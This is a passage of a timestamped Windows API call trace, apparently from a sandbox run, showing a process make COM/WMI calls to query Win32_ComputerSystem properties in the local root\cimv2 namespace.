	[0200.941] WbemLocator:IUnknown:Release (This=0x1b83c180) returned 0x3
	[0200.941] IUnknown:Release (This=0x1cd16188) returned 0x2
	[0200.941] IUnknown:Release (This=0x1cd16188) returned 0x1
	[0200.941] WbemLocator:IUnknown:Release (This=0x1cd1aad8) returned 0x2
	[0200.941] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ecd70 | out: puCount=0x1c6ecd70*=0x2) returned 0x0
	[0200.942] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd70*=0x17, pszText=0x0) returned 0x0
	[0200.942] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.942] CoGetContextToken (in: pToken=0x1c6ec970 | out: pToken=0x1c6ec970) returned 0x0
	[0200.942] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0200.942] WbemLocator:IUnknown:AddRef (This=0x1b83c180) returned 0x2
	[0200.942] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c180, riid=0x1c6ec9f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec9d0 | out: ppvObject=0x1c6ec9d0*=0x1cd16188) returned 0x0
	[0200.942] WbemLocator:IUnknown:Release (This=0x1b83c180) returned 0x2
	[0200.942] IUnknown:AddRef (This=0x1cd16188) returned 0x3
	[0200.942] IEnumWbemClassObject:Clone (in: This=0x1cd16188, ppEnum=0x1c6ece30 | out: ppEnum=0x1c6ece30*=0x1cd1ddb8) returned 0x0
	[0200.943] IUnknown:QueryInterface (in: This=0x1cd1ddb8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca88 | out: ppvObject=0x1c6eca88*=0x1cd1ddc0) returned 0x0
	[0200.943] IClientSecurity:QueryBlanket (in: This=0x1cd1ddc0, pProxy=0x1cd1ddb8, pAuthnSvc=0x1c6eca80, pAuthzSvc=0x1c6eca7c, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78, pImpLevel=0x1c6eca94, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90 | out: pAuthnSvc=0x1c6eca80*=0xa, pAuthzSvc=0x1c6eca7c*=0x0, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78*=0x6, pImpLevel=0x1c6eca94*=0x2, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90*=0x1) returned 0x0
	[0200.943] IUnknown:Release (This=0x1cd1ddc0) returned 0x1
	[0200.943] IUnknown:QueryInterface (in: This=0x1cd1ddb8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca28 | out: ppvObject=0x1c6eca28*=0x1b83c600) returned 0x0
	[0200.943] IUnknown:QueryInterface (in: This=0x1cd1ddb8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9b8 | out: ppvObject=0x1c6ec9b8*=0x1cd1ddc0) returned 0x0
	[0200.943] IClientSecurity:SetBlanket (This=0x1cd1ddc0, pProxy=0x1cd1ddb8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.945] IUnknown:Release (This=0x1cd1ddc0) returned 0x2
	[0200.945] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x1
	[0200.945] CoTaskMemFree (pv=0x1b8398c0) 
	[0200.945] IUnknown:QueryInterface (in: This=0x1cd1ddb8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec650 | out: ppvObject=0x1c6ec650*=0x1b83c600) returned 0x0
	[0200.945] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec6d0 | out: ppvObject=0x1c6ec6d0*=0x0) returned 0x80004002
	[0200.946] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec468 | out: ppvObject=0x1c6ec468*=0x0) returned 0x80004002
	[0200.947] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x3
	[0200.947] CoGetContextToken (in: pToken=0x1c6ec320 | out: pToken=0x1c6ec320) returned 0x0
	[0200.947] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec2e0 | out: ppvObject=0x1c6ec2e0*=0x1b83c4e8) returned 0x0
	[0200.947] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c4e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec310 | out: pCid=0x1c6ec310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.947] WbemLocator:IUnknown:Release (This=0x1b83c4e8) returned 0x3
	[0200.947] CoGetContextToken (in: pToken=0x1c6ec2f0 | out: pToken=0x1c6ec2f0) returned 0x0
	[0200.947] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x4
	[0200.947] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec408 | out: ppvObject=0x1c6ec408*=0x1b83c5d0) returned 0x0
	[0200.947] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x4
	[0200.947] WbemLocator:IRpcOptions:Query (in: This=0x1b83c5d0, pPrx=0x1b83c600, dwProperty=2, pdwValue=0x1c6ec478 | out: pdwValue=0x1c6ec478) returned 0x80004002
	[0200.948] WbemLocator:IUnknown:Release (This=0x1b83c5d0) returned 0x3
	[0200.948] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x2
	[0200.948] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0200.948] CoGetContextToken (in: pToken=0x1c6ec730 | out: pToken=0x1c6ec730) returned 0x0
	[0200.948] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x3
	[0200.948] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x1c6ec870*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec850 | out: ppvObject=0x1c6ec850*=0x1cd1ddb8) returned 0x0
	[0200.948] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x3
	[0200.948] IUnknown:Release (This=0x1cd1ddb8) returned 0x2
	[0200.948] IUnknown:Release (This=0x1cd1ddb8) returned 0x1
	[0200.948] IUnknown:Release (This=0x1cd16188) returned 0x2
	[0200.949] CoGetContextToken (in: pToken=0x1c6ecbf0 | out: pToken=0x1c6ecbf0) returned 0x0
	[0200.949] CoGetContextToken (in: pToken=0x1c6ecb30 | out: pToken=0x1c6ecb30) returned 0x0
	[0200.949] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x2
	[0200.949] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x1c6ecc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ecc50 | out: ppvObject=0x1c6ecc50*=0x1cd1ddb8) returned 0x0
	[0200.949] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x2
	[0200.949] IUnknown:AddRef (This=0x1cd1ddb8) returned 0x3
	[0200.949] IEnumWbemClassObject:Reset (This=0x1cd1ddb8) returned 0x0
	[0200.950] IUnknown:Release (This=0x1cd1ddb8) returned 0x2
	[0200.950] CoTaskMemAlloc (cb=0x8) returned 0x1b84ab90
	[0200.950] IEnumWbemClassObject:Next (in: This=0x1cd1ddb8, lTimeout=-1, uCount=0x1, apObjects=0x1b84ab90, puReturned=0x1c6ece78 | out: apObjects=0x1b84ab90*=0x1cd1de20, puReturned=0x1c6ece78*=0x1) returned 0x0
	[0200.952] IUnknown:QueryInterface (in: This=0x1cd1de20, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec1a0 | out: ppvObject=0x1c6ec1a0*=0x1cd1de20) returned 0x0
	[0200.952] IUnknown:QueryInterface (in: This=0x1cd1de20, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec220 | out: ppvObject=0x1c6ec220*=0x0) returned 0x80004002
	[0200.952] IUnknown:QueryInterface (in: This=0x1cd1de20, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ebfb8 | out: ppvObject=0x1c6ebfb8*=0x0) returned 0x80004002
	[0200.953] IUnknown:AddRef (This=0x1cd1de20) returned 0x3
	[0200.953] CoGetContextToken (in: pToken=0x1c6ebe70 | out: pToken=0x1c6ebe70) returned 0x0
	[0200.953] IUnknown:QueryInterface (in: This=0x1cd1de20, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebe30 | out: ppvObject=0x1c6ebe30*=0x1cd1de28) returned 0x0
	[0200.953] IMarshal:GetUnmarshalClass (in: This=0x1cd1de28, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebe60 | out: pCid=0x1c6ebe60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0200.953] IUnknown:Release (This=0x1cd1de28) returned 0x3
	[0200.953] CoGetContextToken (in: pToken=0x1c6ebe40 | out: pToken=0x1c6ebe40) returned 0x0
	[0200.953] IUnknown:AddRef (This=0x1cd1de20) returned 0x4
	[0200.953] IUnknown:QueryInterface (in: This=0x1cd1de20, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebf58 | out: ppvObject=0x1c6ebf58*=0x0) returned 0x80004002
	[0200.953] IUnknown:Release (This=0x1cd1de20) returned 0x3
	[0200.953] IUnknown:Release (This=0x1cd1de20) returned 0x2
	[0200.953] CoGetContextToken (in: pToken=0x1c6ec300 | out: pToken=0x1c6ec300) returned 0x0
	[0200.953] CoGetContextToken (in: pToken=0x1c6ec240 | out: pToken=0x1c6ec240) returned 0x0
	[0200.953] IUnknown:AddRef (This=0x1cd1de20) returned 0x3
	[0200.954] IUnknown:QueryInterface (in: This=0x1cd1de20, riid=0x1c6ec380*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec360 | out: ppvObject=0x1c6ec360*=0x1cd1de20) returned 0x0
	[0200.954] IUnknown:Release (This=0x1cd1de20) returned 0x3
	[0200.954] IUnknown:Release (This=0x1cd1de20) returned 0x2
	[0200.954] IUnknown:Release (This=0x1cd1de20) returned 0x1
	[0200.954] CoTaskMemFree (pv=0x1b84ab90) 
	[0200.954] CoGetContextToken (in: pToken=0x1c6ecc80 | out: pToken=0x1c6ecc80) returned 0x0
	[0200.954] IUnknown:AddRef (This=0x1cd1de20) returned 0x2
	[0200.954] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__GENUS", lFlags=0, pVal=0x1c6ecdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecdec*=0, plFlavor=0x1c6ecde8*=0 | out: pVal=0x1c6ecdf0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ecdec*=3, plFlavor=0x1c6ecde8*=64) returned 0x0
	[0200.954] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__PATH", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ecd8c*=8, plFlavor=0x1c6ecd88*=64) returned 0x0
	[0200.954] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0200.954] CoGetObjectContext (in: riid=0x1c6ecd28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd20 | out: ppv=0x1c6ecd20*=0x321868) returned 0x0
	[0200.955] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd40 | out: pAptType=0x1c6ecd40*=1) returned 0x0
	[0200.955] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece48 | out: ppvObject=0x1c6ece48*=0x0) returned 0x80004002
	[0200.955] IUnknown:Release (This=0x321868) returned 0x1
	[0200.955] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec3b0 | out: ppv=0x1c6ec3b0*=0x1cd11c20) returned 0x0
	[0200.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11c20, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec0c0 | out: ppvObject=0x1c6ec0c0*=0x0) returned 0x80004002
	[0200.956] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11c20, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0a8 | out: ppvObject=0x1c6ec0a8*=0x1cd205f0) returned 0x0
	[0200.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd205f0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebfb0 | out: ppvObject=0x1c6ebfb0*=0x1cd205f0) returned 0x0
	[0200.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd205f0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec030 | out: ppvObject=0x1c6ec030*=0x0) returned 0x80004002
	[0200.956] WbemDefPath:IUnknown:AddRef (This=0x1cd205f0) returned 0x3
	[0200.956] CoGetContextToken (in: pToken=0x1c6ebc80 | out: pToken=0x1c6ebc80) returned 0x0
	[0200.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd205f0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc40 | out: ppvObject=0x1c6ebc40*=0x1b83f960) returned 0x0
	[0200.956] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b83f960, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebc70 | out: pCid=0x1c6ebc70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.957] WbemDefPath:IUnknown:Release (This=0x1b83f960) returned 0x3
	[0200.957] CoGetContextToken (in: pToken=0x1c6ebc50 | out: pToken=0x1c6ebc50) returned 0x0
	[0200.957] WbemDefPath:IUnknown:AddRef (This=0x1cd205f0) returned 0x4
	[0200.957] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd205f0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebd68 | out: ppvObject=0x1c6ebd68*=0x0) returned 0x80004002
	[0200.957] WbemDefPath:IUnknown:Release (This=0x1cd205f0) returned 0x3
	[0200.957] WbemDefPath:IUnknown:Release (This=0x1cd205f0) returned 0x2
	[0200.957] WbemDefPath:IUnknown:Release (This=0x1cd11c20) returned 0x0
	[0200.957] WbemDefPath:IUnknown:Release (This=0x1cd205f0) returned 0x1
	[0200.958] CoGetContextToken (in: pToken=0x1c6ec980 | out: pToken=0x1c6ec980) returned 0x0
	[0200.958] CoGetContextToken (in: pToken=0x1c6ec8c0 | out: pToken=0x1c6ec8c0) returned 0x0
	[0200.958] WbemDefPath:IUnknown:AddRef (This=0x1cd205f0) returned 0x2
	[0200.958] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd205f0, riid=0x1c6eca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ec9e0 | out: ppvObject=0x1c6ec9e0*=0x1cd205f0) returned 0x0
	[0200.958] WbemDefPath:IUnknown:Release (This=0x1cd205f0) returned 0x2
	[0200.958] WbemDefPath:IUnknown:Release (This=0x1cd205f0) returned 0x1
	[0200.958] CoGetContextToken (in: pToken=0x1c6ecb00 | out: pToken=0x1c6ecb00) returned 0x0
	[0200.958] CoGetContextToken (in: pToken=0x1c6eca40 | out: pToken=0x1c6eca40) returned 0x0
	[0200.958] WbemDefPath:IUnknown:AddRef (This=0x1cd205f0) returned 0x2
	[0200.958] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd205f0, riid=0x1c6ecb80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecb60 | out: ppvObject=0x1c6ecb60*=0x1cd205f0) returned 0x0
	[0200.958] WbemDefPath:IUnknown:Release (This=0x1cd205f0) returned 0x2
	[0200.958] WbemDefPath:IUnknown:AddRef (This=0x1cd205f0) returned 0x3
	[0200.958] WbemDefPath:IWbemPath:SetText (This=0x1cd205f0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0200.958] WbemDefPath:IUnknown:Release (This=0x1cd205f0) returned 0x2
	[0200.959] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ecdc0 | out: puCount=0x1c6ecdc0*=0x2) returned 0x0
	[0200.959] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecdc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecdc0*=0x17, pszText=0x0) returned 0x0
	[0200.959] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecdc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecdc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.959] CoTaskMemAlloc (cb=0x8) returned 0x1b84ab90
	[0200.959] IEnumWbemClassObject:Next (in: This=0x1cd1ddb8, lTimeout=-1, uCount=0x1, apObjects=0x1b84ab90, puReturned=0x1c6ece78 | out: apObjects=0x1b84ab90*=0x0, puReturned=0x1c6ece78*=0x0) returned 0x1
	[0200.959] CoTaskMemFree (pv=0x1b84ab90) 
	[0200.960] CoGetContextToken (in: pToken=0x1c6ecc00 | out: pToken=0x1c6ecc00) returned 0x0
	[0200.960] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x1
	[0200.960] IUnknown:Release (This=0x1cd1ddb8) returned 0x0
	[0200.961] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0200.961] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0200.961] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.961] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0200.961] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.961] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0200.961] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.961] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0200.961] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0200.961] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.962] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0200.962] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.962] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0200.962] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.962] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0200.962] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0200.962] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.962] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
